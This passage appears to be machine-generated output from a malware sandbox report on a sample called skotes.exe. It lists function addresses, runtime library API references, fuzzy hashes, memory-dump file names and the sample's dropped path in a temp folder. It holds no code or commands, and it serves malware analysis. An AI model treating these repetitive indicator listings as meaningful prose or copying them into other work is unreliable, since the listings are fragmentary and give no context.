                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__alloca_probe_16
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2568206803-0
                                                                                                                                              • Opcode ID: 9df4acfc658845fb17537b70fe12277229255bd95a289e64e7df339151908351
                                                                                                                                              • Instruction ID: e5ba4aa972b5b687e82aeba40850cce8f465bb6681a4cf65264b7c2e3798f256
                                                                                                                                              • Opcode Fuzzy Hash: 9df4acfc658845fb17537b70fe12277229255bd95a289e64e7df339151908351
                                                                                                                                              • Instruction Fuzzy Hash: 3C31A3B5E001068BCB14DFAAD5415EEB7B4EF49314F64406FE805E7351DB389D82C799
                                                                                                                                              Function 0042D2B9 Relevance: 7.6, APIs: 5, Instructions: 97COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 0042D344
                                                                                                                                              • ListArray.LIBCONCRT ref: 0042D367
                                                                                                                                              • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0042D370
                                                                                                                                              • ListArray.LIBCONCRT ref: 0042D3A8
                                                                                                                                              • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0042D3B3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::$ArrayListVirtual$ActiveAvailableBase::CountedInterlockedMakeProcessorProcessor::QuickReferenceSchedulerSet::
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4212520697-0
                                                                                                                                              • Opcode ID: cc93f9c0c1130ba6bcbaeec2089951f7ca50d0e43d472b8bf48f25f0fa72e60b
                                                                                                                                              • Instruction ID: 794df60462bd40b248f8bb291adde2cc32f8ca71d2bfd1cb23fae4e7b320e9c5
                                                                                                                                              • Opcode Fuzzy Hash: cc93f9c0c1130ba6bcbaeec2089951f7ca50d0e43d472b8bf48f25f0fa72e60b
                                                                                                                                              • Instruction Fuzzy Hash: 3B31B475B00220EFCB05DF55D484BAEB7A5BF88314F54409AEC069B352CB78ED41CB96
                                                                                                                                              Function 004286C9 Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • _SpinWait.LIBCONCRT ref: 004286EE
                                                                                                                                                • Part of subcall function 0041EAD0: _SpinWait.LIBCONCRT ref: 0041EAE8
                                                                                                                                              • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 00428702
                                                                                                                                              • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00428734
                                                                                                                                              • List.LIBCMT ref: 004287B7
                                                                                                                                              • List.LIBCMT ref: 004287C6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3281396844-0
                                                                                                                                              • Opcode ID: 077f98613c2620de7065ed2d0a0cf93478308c9c6d3ed21310d4f5dedee47172
                                                                                                                                              • Instruction ID: 462aa756160b9a796e7fec1675da630e13b8ae80002d108a4576a0d2cee0735b
                                                                                                                                              • Opcode Fuzzy Hash: 077f98613c2620de7065ed2d0a0cf93478308c9c6d3ed21310d4f5dedee47172
                                                                                                                                              • Instruction Fuzzy Hash: C9318832A02265DFCB14EFA5E9816DEB7B1BF44308FA4406FD80167242CB79AD05CB99
                                                                                                                                              Function 0043182A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004318A4
                                                                                                                                              • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 004318EB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
                                                                                                                                              • String ID: pContext
                                                                                                                                              • API String ID: 3390424672-2046700901
                                                                                                                                              • Opcode ID: e95cf8ccf1556caaf72762b1807beb7f872c2aa3a091a48244363160f3292fa7
                                                                                                                                              • Instruction ID: d01a77f2ab9abe46547ca181dc4035302de0eae64105b64324a031690df06c10
                                                                                                                                              • Opcode Fuzzy Hash: e95cf8ccf1556caaf72762b1807beb7f872c2aa3a091a48244363160f3292fa7
                                                                                                                                              • Instruction Fuzzy Hash: 3421EA35B006159BCB19B765D895ABD73A5BF98338F04112BE411872E1CB6CAC428A9D
                                                                                                                                              Function 0043DFE3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 85COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              • 6C, xrefs: 0043E034
                                                                                                                                              • C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, xrefs: 0043DFE8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
